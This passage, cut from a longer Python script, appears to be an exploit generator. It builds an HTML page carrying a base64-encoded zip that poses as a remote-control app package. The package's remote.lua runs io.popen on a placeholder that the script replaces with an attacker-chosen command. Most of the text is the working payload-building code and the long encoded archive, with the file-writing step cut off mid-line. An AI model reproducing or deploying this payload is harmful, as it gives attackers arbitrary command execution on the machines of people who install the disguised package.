command = "" def generate_payload(): remotename = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) htmlcontent = base64.b64decode(htmlpage).decode("utf-8") return htmlcontent.replace("placeholderb64val", update_payload()).replace("zipfilenametobechanged", remotename) def update_payload(): # Sample Remote Files Stored As Base64 Encoded Zip, Part to Update Is The 'remote.lua' File payloadzip = "UEsDBAoAAAAAACSVSFbg2/a5HQAAAB0AAAAKABwAcmVtb3RlLmx1YVVUCQADEzPkY8Yy5GN1eAsAAQTpAwAABO" payloadzip += "kDAABpby5wb3BlbihbW3JwbGNlbWVseWtteXhdXSkNClBLAwQKAAAAAADcgJVQoVLDXdMEAADTBAAACAAcAGlj" payloadzip += "b24ucG5nVVQJAANgUp9eYFKfXnV4CwABBOkDAAAE6QMAAIlQTkcNChoKAAAADUlIRFIAAABAAAAAQAgGAAAAqm" payloadzip += "lx3gAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAR1SURBVHja7Fs7TBRBGJ69nAUFBGhM" payloadzip += "OBMgwQRjEC3UwoJDG7E5UDtCvGspBBotNDlIsNDmfCS0HjF2Ru4aNRYChQVaABIjCSRe4ZFYgBdJpNDC+Y6ZdV" payloadzip += "j29sUMt7frnwy77M7C/t98/2t2RiOK5eTNV6fpIU5bK204b2PNTEq0LdFWoG0Z558fX5lT+X6aIqX76SFBG46N" payloadzip += "B/xzAAUg5GnLUUBKvgSAKo1RHaEtKUFpKzBytE1QIAq+AIApnmaKH6ZkZQChHUBxjPIoU76a8pABUTo0AKjycG" payloadzip += "pPLZzZYQuUT1EQcm4fjHhQfpweZn2kPGE+Z4a+W0YZAxjlM1WwdbeCMNrr1CQ0F8rPsjheC+IYBC2AyrsCQQuo" payloadzip += "8o5BsHOCmRpWnrB3n/UUBejoj9aAw3MEglV00CwKmEUSLBkwyxO0Cna/6LM4LytZajf6AzMTGA2g8jxZylgygB" payloadzip += "U2iwqrOT9IrzjHYGRAOuDKE2PxphlG/ysJh+gsEBmQJOGRG2YmMBIiAJIs2u0CwObwGkm4JCkyIEHCJwndCVIG" payloadzip += "/JDBgFhzHWmhzYls7/whq8WfpL7uCOmM1evXV4vb9N7vPX2d9PEoTVGW9kqhf+L8MTJ8ucNR34/rWyT1ZKF8fm" payloadzip += "/wlA7cs/kCuf/yy56+w30dZKhnNzfb2Noh1x68l1YnRKpd7WEk7zz/pP8ORc92NOu/45wrD0FfSaMPiUfpj24V" payloadzip += "iuU/FElu4ZulCYhswMhzRcEIPso454I+6CtReqKqGFCkVHXzslOv18mlrqNlU0AD7SHcNEB99JFdH0T8Ev7MTE" payloadzip += "Eh9XUfoIwBsN3hvuOVTYSaB1hidIzvVr6Ti5QJouCaZOrrElU1ogBAdGb7osDa5j4Adkd6hbxNN5dD3z9mrChj" payloadzip += "XoT4TJBLcOV5DhBzmFv4igFTb9ap01pz/dzkYJfptevyYr9/GQCf0Rlr0KnPnR6uWfmTQAAAmg/1tO4Ji2LYwz" payloadzip += "0VpgAAlvwAwCRNeLjt88RITHxwb1JIimT6gJIKhfrPxSyjAITXAmL6C9rfFfIBnL+4daEMAE+LAYwkWYoyBsRl" payloadzip += "A9DisDKMCVkfp74YHossA7x99YReGCEvMAuhHqQEAJZlKb2x+ct1woIKEuUtT3fNRhfXOo816IDiGS8RxkTmtY" payloadzip += "B+BXIqA1InRGpQmngYzIVQ+Tl8JuMA5EMIQF5PhNhX01LIAMgaM8FsmJTnX4lFAB6FCIDpfbUAW3IaBhbMWX0d" payloadzip += "nggBABMVq0HGgiCDkDPuPzArh7H4uBBA5cvriW3nA5h3TAUQgJTZekHTCRFGkyCZQrbSSvKKM0L0gfGApMgo98" payloadzip += "cq3bSbEksRn8wYeRT4Mu9LZdmDvTUKAt59wG6xtO2kaI2CwEfe9p3dbpiYIQqmzxTYvNwNEwYg4BzTPlUeqfyY" payloadzip += "mw1U/zdNeflvLE84w7JGP4x6uxflPTPAwIY2Up2Nk+Vk7aB7i2VvnQUQqtccYsSnZW2qlr55mkULcfO0lCqO+H" payloadzip += "3ztI3DROtmzIg7oDaUXDZOXqiQvwIMAK08yAN3QNxrAAAAAElFTkSuQmCCUEsDBBQAAAAIANyAlVBoc+9FTiAA" payloadzip += "ABkiAAAOABwAaWNvbl9oaXJlcy5wbmdVVAkAA2BSn15gUp9edXgLAAEE6QMAAATpAwAAVXl5PNRd9P/5zAwzlm" payloadzip += "amIiKZnhYU0fKkFDOU1KPQYicTQiVJlkrMpySVRBtpM1SIRNmJmQj1oKgsWbK02A2yjDHL78Pz+35fr69/Pvfc" payloadzip += "c+69Z3nfc88xV60szObJqsgCwLzdu3bsB8BhQ0RMksY+/aQ8MvZZ7G9q53/gpId/0GG/I2DsftL1CG33icOeR/" payloadzip += "YfOex+9tSHI9sAlhXv3mF88EzLYLv5FaemeOJIa1T2yF+7o/UvaHaub46hLcglLtC1/uB6JffU1pq1l3KYNpc1" payloadzip += "P6/GL2rGLb71zc6G65i77rvDUNSgtZNDzV8fyoZIXei8l9z3MRUrHilXRrqvm/LveG2eEfr1h9HHLVNTYUl3ev" payloadzip += "e1p/wrEn0K+mgY9Axu+QvKMibGjg5xJYbeIyvNiOKp4faBnsA3C2OSFbdDvcK48fTGzVbvOQ5GjekumXtFBjuX" payloadzip += "yQ9aiAQniRfLC+Tl3XgbSVDXhKPHFybEr+4/bqhyrf151kgoSfp2BIq55KlTb4R1ovpB01DqdI1hpUXZGYMld9" payloadzip += "4y3e0YgN7zGB9o+LFnYpve+qjFtl2dov6zZlVAAK/s5gQdQVNedIP7lq48K2yXr/tGIirEO99saMh2TbDRVLZ+" payloadzip += "dPHmLzwVOlNdOTaK09kN2RMC4fVkA6llCoMqCwhgNaIoFH97bvJ2aL28tyqZAO/zeyP+4qyzHu9iRnRmpG3t9F" payloadzip += "1OgF3nY+la/K5vKkbZstX4xDXUWLk8HSUaMISmLCvFGc+asaPsrVlDsngCXEnpjWgUW8odn85x81wtb7caU//G" payloadzip += "tdB7Q5TrJDWZdjTr4Mh9PRSgVlFk1aufXpbZu9BN+cyzrD3YXK6CKPd5UmaJ5WoT/c7csVdH8MtwUGPL17+m6y" payloadzip += "CMef1hwYVsacyUK0l0zYTQQ7V859dmPiYazPTzb1yvAgKTchIPa34uvy9yX4Ni83oFEtwbCnsJJHB35OunldE3" payloadzip += "qowwbDsVg6Wo8P55r2XgWEQZXe8v3xd1MqS4hUUXAUHd5STsut8RpvZLGUArLOMYWfMv/Aqn+ZpSMbqxjK6dcE" payloadzip += "jzBW/7gZ3WVOXFsgRQCKUSGMBuKOPYF4SqExACnLPml19nMTcyZldIsBU5AmNsyOgiznLH1ggPn5AcCVe/Rcb1" payloadzip += "OBtdAe6LcJZVLV8/Str9cLrvDSyAVQpiX4eOijQ+/qyMhtzl5Zczt7gqI2hft7rHTGI77/2h93SSk98aVwKEs+" payloadzip += "wUQ5vGtnMGDxoz3TUJILDmE627OvRU6o63YgqqyiKoMFISWSGWCW0RMbLy6Wx5RFcFm90mJ8k6X7Rv81vKZqde" payloadzip += "3MN8bRrEWHa5pMtyAul6kRmuLHtuAy7e8W+CvZLE176j6hpdL6J25PQTwfQFMlxVFBv/PaCuMo8p86Ts6EUDWH" payloadzip += "FA6PLCQ3SNnvVi5PTPkv4eWQPY4cBvSrfnHBdcWDV4sB1V256IZzhli6cUWGzjgSLEAO5N4IuQ2YH/QaHu/Qm8" payloadzip += "WiD+e8AzlAxDi8TGhyPo1Oh902caCzGBjY5C/TR7Tjfl3V/CbYICwfQlMvytJPa971Jw9lNyPfwVmHHeqX4eFV" payloadzip += "JT+K29xKfvpN/usMNdKZ4jKqWN1SBWU+jTif/JTPd1W4ag8ZGsXZ/05fKHpMaYu2n7Y6F7tfjBry/F1+gxNz/c" payloadzip += "4iYn1iGdI93qDmIxHvHLC5gSFP65bAxsvpCZ8CA8KpRBv/QM5bVi4B8v4fNyK/+tul8P59zzZZFJKf/3S9Hhax" payloadzip += "KPV6yrCd2U8b38wqnHIZgJIdrixhlk8tvsoqSRiK+qjTMRO/Gdp5+UzQt38JRhl3TT7Xm2QmRYKXRtqaPo4Q4i" payloadzip += "rbr7ZIl6p9cmYj+4Wwv15R6IwOPwaTbE7B1lvWqmf1FHv7X7bkj8bY/zeslv7aNkLbElkWC3YmjQGD51HUFhWF" payloadzip += "MTVuwXlnvQt9oj/T/4TIQxSqTiUsP2ohMKEqvxjgNCRGVDYUZWQrYB7FNkNfHxOeX2CA7tptAINNAUgwn8R/hu" payloadzip += "fAA9uuIH1+gMhcmXpa/XWRHZGd08Lxd4BLObMkhU8NMRd9l1PNiJmyUEB4Qn+HgqjgAV6rCMAVZC5P8QvUaEbf" payloadzip += "aX0VeJBQlh6LCuOLG3A5t9PT/0cceL0NIneF/3UcoGlsY/yE8NbfylX6gzBh42Hz9e5X5WCek00l0jhukI1K+s" payloadzip += "Z0fTP7w4SKOUJ0fjGCe920tCh9+QGZxIiWmFOjtoU/pMcS+M5/Aj9F3WkNicjx0loT7m0Gs7GpRBhxIjzdQghK" payloadzip += "0tDhvrM6xQR1cTtjVWVeODc4nsojZecjeFcYS3fsRoqcLX/L3o4dqOX6Gwx1H3XIHGC32EvSeoy0EyL+E0kF/t" payloadzip += "a7yqNDM+b8qVgqpJoCZV31baXR0G+UQmuaRwPW0ArE70k7aKiUZfoMbLabDDZPPAGrxfB973wCiRaRGWFuqu04" payloadzip += "rJCFQFS/BZ6OHhB7hsJ5xmR06U0VN9UJkaxF6YPCl04zXOXhZ8XTmIJ80glYUhbvY6yMEHYh8sTF/d/S56B/q1" payloadzip += "4qmNokfjRMajxvSQI/YfPGS4h+mwUTtdBPYECOLj2VL2Q8T3R2S4amLwcrCZQW5RoKHoegALWrIeV0/Dbl3kzs" payloadzip += "myrGbOTwq0KAwr6S2AIi1xouKfU4kTFMZMpWn3lNyuszLcCTH4H7FaEfrL/hbCNugPKu+hoOQTByc0d3/QQQp+" payloadzip += "UtArl1aiVfudZHe9wrOxldqrzOo0NJ6D1Uex7iKfUTmG06Y0wZ077rGQI0au2PmlEJK/InUCIs0m0WhlQDl7BQ" payloadzip += "5tpIPMrv40tDcOlvDxDJNbhatp4eTZ6ee7fqehqVvBes2v5E8L4epV8SGkXhpNm1APFFHO34BdNQVXhIeQdbrI" payloadzip += "GwwxMalWnCQjVdq/ZMaWGZdMDwnEvK5yNVSlNZK51UYbwJ3WMu9CvRTqN4ml79/q6DZ5N4yZthKahPiYxFPzuy" payloadzip += "5zmw1AF3Oyu4fVjoJlevfJjIDshOgQC3h/8KAqzq0f2ka+Ac1t3wnf6CQ8ZmEElkeMVMF97f2FOLc+uCfCs+Xq" payloadzip += "UsDKeVJ/JB7YxMb0oqZCizhwmiQyKFGRpLVyg0V4332jRLantCkhTiqwEUldOxNsCcCOKBuUvFpbDM6BsESAZ7" payloadzip += "hkWAdkuahBhBi4jz+Sif1p+JGLU0ugKD0iIwhqxAh7Zi1DSQ2yWdBbsDavBdGbIaKbi+DEHJN2UdDsQOQOqkN3" payloadzip += "Hy7n2xxzV7/7mjn5K+lydTZzzL/S4qL+ky9dy1CdY95r/3SbB3eyJbnHJnnJdNB7YDOs0OxP7EzqpsBp+/R+zy" payloadzip += "cqctAwKOn5bgb3HH9MZH8gcy9/o4N2o5SmxucHz6XhgQRonw1adoHmgeqs8ypneMA8HJb2eFXDnBq//s5TYk9W" payloadzip += "g5oQD7nHfjLZqwwAixT1rBK7EXOcIL+rBIe2eO9UB9k4McJoVylckTUMnZ3qkOoyNJGbB1bJt7GqrD2YALmOmf" payloadzip += "3ed+bU3vVUzsocsqYpoGJ7/JFzxmjka2x8/8CAB7cIh05iN4OXEiDabp5A6P1JBy9rHQ18Y/2cPpPejaPRX+eD" payloadzip += "txiPTn59LZ91EDaHdNloivE8KcjxsKqKh+pAeDxqBIyB2EOhLpvAS4JnzMS+5MgR0TQRr4UFXh0O1hFb++YYQb" payloadzip += "Fp5XJSaH9vx143Cjzqe4pnDqlDUe7X9dwkhDGDDfN9DRsRQP1zmxC7wKZlYPUgPA5Z9N/qbYvSqiMJoAZwxeyP" payloadzip += "GvpFyWeeXIQEGHsaFxXqc9+owRAWvk9tQaSH+nPy5y//EYfftZd09snlS//6UlWpDEnjzVgOqdzrPxfXQ6cb+s" payloadzip += "7iuPZuclB/P91iAAAlc7seiokwmr62KTMXzxZRYPTBtJ8owkN4ervbP2o+wsHn3cXRdFeair+4iaMTKql3+S0O" payloadzip += "/mQo2jHaRlE/OXFcNCUR8Lqjp8SP25Ql3WYdq0P9AutaBkIE3+jXWMV+wbzF/WlNGoFg4VKgaCF21E+OybftEG" payloadzip += "fxf+om5Aru27KEQz8rtQjNmyJZI0LVIAWWR+6hhqFfeMbhP+rjlX9OChMbmmZ+P88cDFi6f/RXBOfgm/EfvBzB" payloadzip += "fU7hn54S4td2qXsrwU4S8ZhkTszsWJovuE/fMuN1qv9mxG3lhJ7HoW/45yJdjt+bkPTXUs7rxTftCQiOBb2NsX" payloadzip += "XqmaWifenmyGGbkNxf9hN/FXmJIqa6D1VXr++Fwec3JGrK5r3RegPewVrsyG6Dk7uOFk90mOpf9q7JoXQ+JaO1" payloadzip += "rLrtzgoJdYeiAzCBRsmv2O3KogHcQwV4IdluaS/bnDJhmWTxokNDCk1cdyn0tQJ7wtJyK7yUEAWls+MyjJdeLT" payloadzip += "xCY4U4y9YJNAI02pWYAfGTSAxHb43oSHVTUlCJQp3pAH3J1RcTlrWLyOB5XY3qf0rFOc4cOZEvDqs+2TZq/MTH" payloadzip += "0x/QZ7khS0NszZGuM92NjhLe+Ts/99688l3QhiVo8KptRhbO2ErlbDUfctViD6kqhJep+7wjzFNeEkSr6//rOd" payloadzip += "Kb0haHK4u6akJk73WQbPTWxArx9wFaTN7HS/TzbxpefRWkSA38kQYNwEX8G6DFGEjY86gegWO3W/djOdkAKno0" payloadzip += "oAVIS9bEPUPXOki6zrEyWA5+P3dyI2rEH3ZvfuUzEzR1ji59glQhsT0ZWtf/7NztZ6gBpQZzqPr3BN9u9Zw2Ke" payloadzip += "XaBXC58trB9taZrmPOuTrLvA3/fNWflD3tWLafYRea+uN92+zW0uYnAi06U8G3eSlqFqWol16to5RTFIsrOiaK" payloadzip += "UNU2ria3k87YgbLyGqbNlIHX0aZT1piGhuvv/Q3yUYrUmZrA+HRcjrgvvusq5hqcMtPnubaUl+iLWUTDVIN9Cw" payloadzip += "E0+o5pMX8Ep/wWbHWQjH+9ijC9rqN3PIo4/Pr8ySIkuzdpQlKtT8fCJT2ABTZTZTlzsbO21JuN5S9KIxtZShqr" payloadzip += "yuYvNdSCzQSS3T9K5gidP9k0ubRqFjoVhguZ8WQuVxmp7nfVovkjNxxkez2aJGoZLNf1VEBtLrldbPX/OuvSh9" payloadzip += "TZu/JMRPnqwQvM5/lzMLxQEpqm3+5TgyAgHFMcrq6bdOYlx2G2dPWu5fpDHRaOpskQnoY54iDRC/6PbtjPnZDw" payloadzip += "m2xcTvsFu+9aBw/XbWIsLLKT5QsuTsnYCYOFqbGOCtvDljYg4BC05UfUqa5bVb59y5+2IMrKqmwtzK6cZTni8r" payloadzip += "6IGPRvBHp3YPbUsiwdJCvcRKkAdQUPN/17VHT7dQn4Yo1xYiIo1H7D6KS+7RIMko3hedMaV/Nrc8W7v7a8BT29" payloadzip += "VYwH2T09Cx8bRoTIO0ieWgAY3Bzbzz3iKbr9susttl+RAobCZ9cLnT8w6IYHDVkNVjFhunSh1Wh7lXpf7dRMn6" payloadzip += "dkT5Hy3ljcbEZaUfq9JFv+u7iO5eWuCG2kK9qXVLlP9+/pp7b09rBErT85EVkKI7ezw3o5Nhms9b6BY3LmwOjZ" payloadzip += "bzd71fRxUFfYnDk77AGmDPQexJxS+4huNp2LGXCT+BHx1WCwT3+KC9/kj3ddMKnhJbo9XwPBjX5zkb3imac2uf" payloadzip += "KSSCZmOQJX/rGTvnJEizZofiVjOYKDmAzlWJzJAH3QHPXGc8cfXQDXuonZiIb0QTOQdqRUP4MMlp+NhTDiNgD1" payloadzip += "WQerOVTOqEYsOcM7EGapawBQv2XifXnFaUv6d8FAaMmTJikE2P4TVR1apcKROIOzQ74uF43aD8oiQJNdp9AZZy" payloadzip += "BPowGUnF59a9GbZ0AAdJFzlNfvE1pYM8xOkWraj/WTjDAL0xa/fAWsva5jp8//lKMjhS0Zz+E6yNL0KYtxfguG" payloadzip += "W8Xp+vTe/+9icfDmu7siQ14r1KV8UsLBCmtq+1sdHduF9+0jLCpOikc8E9a9nvVZDjs5L89n9iSmTMqCdmde2u" payloadzip += "z5K532nlk1NDeU8j7POzgm9XVWCe4Sk3phRXTpXeHU4bklL+P/5GfHb3GUZQDce0spFeWWmFn49Xpgqm1cVSMo" payloadzip += "H6Trd2ybuNtdmJIwIn371ugKGFSWYx/dkiumnBuOiOZJIbveYs/aJJ4xHelcjmzUqmqUGNtuGPSJ0cfi/ATLB5" payloadzip += "yJ4uCM0sdzXtFyzhG7hPQ86Y47GWp1fizuk0OIszlCAjDVz5D4mr2fe47Gs1kKnzijEY0cT3Nkh895Pbh+XcYq" payloadzip += "5aWDJK6j4M90ZrnzzCGOoc/EhI5UjANAqrVthqQOKeBJgmeWmyO+JARSnZUyJFY/XdQNN7fmK0AVEeJwuNxerD" payloadzip += "q9dl5zMuKVAiSoqssDT3Uhm4xptP0UxVS8ORbH/JRAlsaSeECDgFIhWhGL6wyNBdThXbOA/n4/bCsgdIYCd7/r" payloadzip += "CZG6QpFUtvRl7ArTfgNkZd1zlBCHdKXajoZc15aiPmgIuwrMpVo5YooAAzPPsMVdC9012KYEq/KlCfdsZ3V703" payloadzip += "NCRFemDdvJsoOSeeAtA3Z22HyRAz8W15s4s0loSURvvkI8GpwHOKXxxc/gnEcPdtf1sjEvBCh5myPjDf37PkCn" payloadzip += "pla+uFUQZOmqhZLbjFaDsLYZND4kTnTs9OzCDMDSz61b5gOcWvTUnSwFX+wtDkn1qvYSsLZtnDhehdx+c/KxwO" payloadzip += "/UD0/LxVc+O3JECa7YC3FMpH/6mEh90oBz7k9Yd38050v/lNIhnjCTNYA3H1j6GaFpHPYQYLlgHdX01XjAWETU" payloadzip += "CUzzTdHD8y70xaeU1vd7ar5ptPxIduCYIaLTWNc+YwDpBziJeFjSR2eNZ2APo3Pbm56xBRrya/sLU3Sk6gqIx4" payloadzip += "Rvq8GskrTZO1ZQM2WBVSOJJJfhzsmSqUVvqrjrTbKOBfdd+P5tixb04oCikBJnoGmRSIpwbQs3HV5vZ/Ze1hyp" payloadzip += "ixndjXSGuBH2yA31Zea3PR5OmmDFPIP1f1Ju47jNyojzx3+KMbuwWNQ8LMA6a0hQelKKwfi1AmNnZZU0GhZHAl" payloadzip += "FDEwbfWNx7Y/sOy8HZwx7VmpQbb3v1SoEhTTbsMQNYqmn0KEfcMZ3K/1HCMduyKnFN/WSThxaqEuU5D/KjFMfn" payloadzip += "4uvkEjJTnlr1y48YJJ+jwNj7vQmBpIcBgfuclGS1eBhudm/QRQo0YDymUSLvMtCqjiUB0x/xOO7hrVIXhEdFny" payloadzip += "r3w/MtaS8zP35ZC2NPJ+ieXpgKBjvNRJcBDFMmONwmHy3Uf7BGFdoWwrkkrO7RYE2/OBOy0eJcm7ZUzJWpAEC9" payloadzip += "PO5+CvItOtSOTRwhcm9yYzgYfJwfZnZgYBjZXT2lk6XA3XajtVlSt46lewlN7HoybL9wiP+TJeG9M1lwo/DEn8" payloadzip += "qthxs7Jl8V7ZVrv47VcEnt1JF3y+vbN1zQVNsa77KlXx97Hyf8pv3r+Qjj1svZxv/zPk7huRqXnPlU+BwwWC+u" payloadzip += "ksKAjEfd1YoTWb8KOraFdDW6VKf87UaC3Ys7MPlXpluhCCCma5AVC52NXIh5vHAgnwzws+edoMTvs3oWBeDW62" payloadzip += "AMSCz7PKyNA4ivFWO+nkSAYeCR1ool67pyMvdfbdZ7I4BdZXsGJNmB4I9l5nmt2eK39niuY6UCJOn/KTXEyvf3" payloadzip += "VTUT55LBF9vu1PTGTS+BmvEo7VBTC0LKi9KBp/SZBH3YjJ3Y/XdTaMnds+KsagSh/bPBRZy/i0hTXuwGVz62TZ" payloadzip += "z9Dp1+jNmCf3bIXE6Dd57Dgm22UBAsavOZznF7iNBUnqQZ6WPbHtrQCNSo8NgeJRmIxZRaKtfwqxDPCPg35ghA" payloadzip += "73enFIlOK0LSxgNjatHLqkhpqMbsKQkfGDVBuOsB/H26JiXr1dC5sedzgzd7IEseoN0+jay7BGaXBVWw4iclr9" payloadzip += "XQTkUeAjk+fcF/tFXnOEQ11AI7aTKLCjD0zeHnoKRoK1xIx54kw5MNo9Evvo5GPyz1Hcj89eX+FAFU/l7rKYlu" payloadzip += "GKVkNI5LnThrCexTuTrFTYrgNA+gNj3je+MCeCgDEKWqEzzEWqgGzgBeNhkPhgfk4bCza9MM1ja26nhKHPdJgy" payloadzip += "f23Lnl9YuJtsfFUy/PRAM7MFc3u0kF0mpllvMWwtfkxlrW3gDAaeBxjHfZEuazq6zx8XBH9ThLPG8xaD/Luy1p" payloadzip += "6Z29f7PcVXhubtnKC5B13cos/5YsrJUhoM8a/Fo78jBzzHEI81TU46xWO0hda18nBWiFh+THCjxDtU8K1jfwPQ" payloadzip += "Q78Yz4QzvDwy5gSflJWmiy6iw4mD4Zg4mOR3+YLpEnwIZvWp4Sy7xRk3SdkO0vSYDezm382+XoQDgm2GkXpTbT" payloadzip += "eoTIUAKsLb+95kTpvbVYKOgzJ4vnwHjza9XdPBcrjFv0SBRUj8xqQOrv/kdJNw3jtteKi/tn7eCWmjuXjPxjq3" payloadzip += "seq9Gm/k0J4BmCoeJHoSTUVre0pUs/9EMwhREd0DKPpw0FB2hgmCAKcsDbbl0KwVjJ9+RjcecjaXS1yHt6CdQt" payloadzip += "dzwiau0LAOwotmeg2/PgR0R0vVRUOMC57rtpwzJw97j1ahzqFJV+TilcE8eIv2wyGmRPgy3F+xuKNV+827ieTM" payloadzip += "TRDjxaKlh4gsi8hpmz5drLUlMs0otIjMtJBYO6k2TuipXfqCQGOan9xyJnSN20q0Cbii5xunb0R0fOXTuzmssM" payloadzip += "WKDUXslJ3QoHPs4MQszYIP237toWsDpxr+D3Hzzj4st3BaO6d8nc77BoRkMDYayu1NrDfEIGCxKBZtzj1s6P20" payloadzip += "+kXUKHxo629sigBG9bz5YdJ/++icxTxT2aB4yawMhLm7I05kOazbV0HFw59/o+VtDlktFnAK55zg3P3V+s2sSN" payloadzip += "xTh7bzn3P8XNzT98mPxVYJmLZ2oBem9Fk8ByE+z5bINVOqhPVOSl4s+7pdG0hrEXn5aCs8XOA96ilO+IZlrYor" payloadzip += "Y1gK512v2Lm/DkxVMxueCEHui0akVKbj9nLUxf/Gb+JB7qYr1f7jQ3goP5jm+6N8gw5NZWhD7osM/4OXZj9g55" payloadzip += "TOd0Zcswtuf9251Qa78xfXHJuq69i2fO4+pQvYFP/ZPja7aEbEjRbZN9gHT82SLF3nm4XTJTmCM+PQh7JvFOY/" payloadzip += "bYVJzfGvG3AEg2QPT/TdmbYA+xdxqKWHlqaF+OzWBmE3CTXg+vzvwpiLKeQb7rqB83KocarRczdPuP4qrC0LDC" payloadzip += "QFg1g7QZKKOmDz8V8j3VII1K9anvjaHB71MrGxyFH92eUXhPt1+Ee/WB9sLgU/nfGh6/STysxU1mwI0v6c9+3C" payloadzip += "09/2STFM73+qC+aGITHFzGtMMwdW/S/UaEaIlnrmWH9/TvG7K20uDL+ROyRlwiB9ak5tUJL6ff4Kn9xtZK5zyf" payloadzip += "ZfIKflxEzum2uoUGwI2eAiYq7hfV/rARCGsTSn3XOM2nbpJ6OXMSYdtW0Nu+B9lCbxDJ9yyNwRq0qeBMqXUqJk" payloadzip += "gtA8YoL8F6e2elMRiOvujWhSWLcHnhgHo/yvx4MdFVpnP23y8nYi31rxMYNhWsar1eePhVhqS+IJ8q/b58ZYUL" payloadzip += "kfndAg27CJ8bB8JCCTC7oRlQcaDA+o9Q+o9A/g/BIP3Pd27yEvwvEX01GNF+LqAeWr8AMjZn8gfgXaMMyRmC5h" payloadzip += "O88vgnF0vPilkJ50OSDFI+1ucxbbdBBcxbddQ7dCMlNxKpsJ+EDPz6UmwCaLf6mgegahVil6CtbpQDkTJ0uvoB" payloadzip += "YQDsHyK8sH6EBjxB9GxHKRskztuXwdOlhIeKoKfaxM9/t4Ahl0b5o7gc8X2x5hqHzHj5CK2T8o2ncUUm6ZJb1U" payloadzip += "IC2rYdXUOAYV1xoEAOSmSQTURc8yBWX2wmvHFqXkIav10bimPwwrgVq0kwbmrH43goY87gjr5l0C/ZSLKPjKov" payloadzip += "lkVQXRMue/b3E9jy+rsu+JpQSdWIUhQh5ubxI10cd2yFBRl5UCEuBXMc498yb3pbZVCrFQlqluLK9jM2b3x/C2" payloadzip += "KS6sYoAyI3zAA9FomkhirJYrIOOUIpOCaLU7XW594C6gYdFoJKz521/Qmyw+vgYL5waEwJvDRJb+wGdeXgXdlb" payloadzip += "IxzohIMq4YLypajQnvb3ZsBupzLDaHUrVUUEMCDjytNU9fRUGHKVDS9Y7pqf846RPtuIzPjuu37sxHuda1QP/a" payloadzip += "4pNoBeafAQ9QJbFdx7r9lzyHA0AO+kBdrlZEyFd2HcyF9fPsmlkHDZMsRpp1POHGAsXca0Guxw9i33giqSGf+Q" payloadzip += "H14dQYUXuTsVCdI78fcWyJbuDcVBfASapUAlU/we6lFbRJl3wiWmmMl1CTQ9TW05RsLRKTkY30aST6d1HkN6Ix" payloadzip += "6ljUTLY3dpGcnbxpjbgItJaU8bOTn7wyX5MvpBDHHzTA6FS+66Sn4bFl/GI+iPi1x2c8eKgqMbaUcdG164dJkB" payloadzip += "g4o+VhCv2cRfBlneVGUbY6bXRtqxJ8cqefxDBCAgvbu7OK6edBxcBE0hDWgktIyCg1rChYRFm+RMvuRdEz0Jzh" payloadzip += "hdDlRrqrLCSxU0WZbjLCLBivkEE5Ivm6r9ETHCKFWCyWhHahEOvxy3QSZbuOaXmyN2Ni1CL2tfAOHyTjxZcfjj" payloadzip += "lIP9eP48KRxskb5g3DCfdIE7BiFKHnzHCnFl6asuBrApxszX26hFOB/TPR2XnIWHQ1weYD48FHFhYjWpVzZmxp" payloadzip += "tV7LtYHQdLvimSPGXlo0jxyoozx2ccL+MQDGH4MFfJ/jKqtPTOS++uR+o6CN3KLwBEhl+Y6I68La0zn3q6PmHw" payloadzip += "Z1O3GaD3yxl2f51JznJBN+9pnOjwm16KAxJeU0ADhvlh5mbF2T3uR8kNhRDgipH8JUP8MuqlEPxHZea+xDqOjd" payloadzip += "HOaxjKnipJr4pb9FhHW9F3TJt10MhHidxrjGWbYvxtBoNzwlaqQ1sdgXOLSJcPXGB67Xitf381f/msRnuIFyee" payloadzip += "M5gfaM4/XFlqHfLqBLi3lSqfjHtbtNZ4PHtm99uOUzh1LDUEadpllnHj+886p7Cti60TKdFT6a4nA7Hw+DdqKR" payloadzip += "9Uu2iWElo7li3Quy358rPJYxLT/p+3zM8rNzuKYn19WTcpPpafhp0vE3HwU4XceE2XvPo+4eIGa6t74pI7QwdN" payloadzip += "Dbd9T1jLD+wKA6hpNNUky0hHL6IsDXEKOnNPYfToD1eODqs5oT45giDkAB56qg2il7Q8zgXsb7epxY6XJsyL/w" payloadzip += "9QSwMEFAAAAAgAyW5GVpHSloBqAAAAfgAAAAoAHABsYXlvdXQueG1sVVQJAAPaTOFj2kzhY3V4CwABBOkDAAAE" payloadzip += "6QMAALOxr8jNUShLLSrOzM+zVTLUM1BSSM1Lzk/JzEu3VSotSdO1ULK34+WyyUmszC8tAbI4bYryy0E0p01SaU" payloadzip += "lJfp5CSWpFia2Sc35ubmJeioKhkkJ+Xkliga1SMkQEKKAP1qcP0Qg0TB9qGgBQSwMEFAAAAAgA625GVnXmTfxA" payloadzip += "AAAAUQAAAAkAHABtZXRhLnByb3BVVAkAAxpN4WMaTeFjdXgLAAEE6QMAAATpAwAAy00tSdTLS8xNtVIIyHdWCE" payloadzip += "ktLuHlygUJJpaWZOQXWSlkmBRlG+dVGUCFU1KLk4syC0oy8/PAWqDCJYnpxWA+AFBLAwQKAAAAAADObkZWAAAA" payloadzip += "AAAAAAAAAAAADQAcAHNldHRpbmdzLnByb3BVVAkAA+RM4WPkTOFjdXgLAAEE6QMAAATpAwAAUEsBAh4DCgAAAA" payloadzip += "AAJJVIVuDb9rkdAAAAHQAAAAoAGAAAAAAAAQAAAKSBAAAAAHJlbW90ZS5sdWFVVAUAAxMz5GN1eAsAAQTpAwAA" payloadzip += "BOkDAABQSwECHgMKAAAAAADcgJVQoVLDXdMEAADTBAAACAAYAAAAAAAAAAAApIFhAAAAaWNvbi5wbmdVVAUAA2" payloadzip += "BSn151eAsAAQTpAwAABOkDAABQSwECHgMUAAAACADcgJVQaHPvRU4gAAAZIgAADgAYAAAAAAAAAAAApIF2BQAA" payloadzip += "aWNvbl9oaXJlcy5wbmdVVAUAA2BSn151eAsAAQTpAwAABOkDAABQSwECHgMUAAAACADJbkZWkdKWgGoAAAB+AA" payloadzip += "AACgAYAAAAAAABAAAApIEMJgAAbGF5b3V0LnhtbFVUBQAD2kzhY3V4CwABBOkDAAAE6QMAAFBLAQIeAxQAAAAI" payloadzip += "AOtuRlZ15k38QAAAAFEAAAAJABgAAAAAAAEAAACkgbomAABtZXRhLnByb3BVVAUAAxpN4WN1eAsAAQTpAwAABO" payloadzip += "kDAABQSwECHgMKAAAAAADObkZWAAAAAAAAAAAAAAAADQAYAAAAAAAAAAAApIE9JwAAc2V0dGluZ3MucHJvcFVU" payloadzip += "BQAD5EzhY3V4CwABBOkDAAAE6QMAAFBLBQYAAAAABgAGAOQBAACEJwAAAAA=" with open('src.zip', 